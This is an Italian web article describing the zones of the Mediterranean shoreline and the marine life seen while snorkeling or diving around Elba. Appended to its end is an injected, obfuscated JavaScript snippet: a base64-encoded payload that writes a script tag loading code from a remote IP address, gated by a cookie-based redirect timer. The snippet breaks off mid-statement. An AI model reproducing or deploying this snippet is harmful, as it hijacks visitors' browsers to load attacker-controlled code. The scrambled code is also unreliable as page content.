Passeggiare lungo la spiaggia, sopra gli scogli, prendere maschera e pinne per un’escursione di snorkeling naturalistico o immergersi con le bombole a profondità maggiori, in ognuno di questi ambienti c’è ricchezza di vita e biodiversità.
Continua a leggere e capirai meglio!
Il litorale ha una suddivisione di piani ben precisa e ognuno di essi ha le stesse caratteristiche chimico-fisiche e organismi animali e vegetali che lo popolano.
Partendo dalla superficie, ad esempio, abbiamo il cosiddetto PIANO SOPRALITORALE che corrisponde alla parte emersa, bagnata dalle onde, dove possiamo trovare piccoli molluschi e crostacei (tutti assolutamente innocui) che vivono sugli scogli.
Scendendo un pochino di più abbiamo il PIANO MESOLITORALE che visitiamo ogni volta che svolgiamo un’escursione di snorkeling naturalistico, lungo costa. Possiamo osservare moltissimi organismi come patelle, pomodori di mare o i famosi denti di cane e molti altri.
Il piano litorale ancora più profondo è l’ INFRALITORALE che arriva fin dove scompaiono le alghe fotofile (amanti della luce) e la Posidonia oceanica.
Per ultimo il PIANO CIRCALITORALE, preferito dai subacquei che amano osservare praterie di gorgonie e altri affascinanti organismi del mare…profondo.
L’Isola d’Elba sarà il luogo perfetto per andare alla scoperta di questi piccoli/grandi ecosistemi del nostro Mediterraneo.
Ph Gianluca Cucco
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘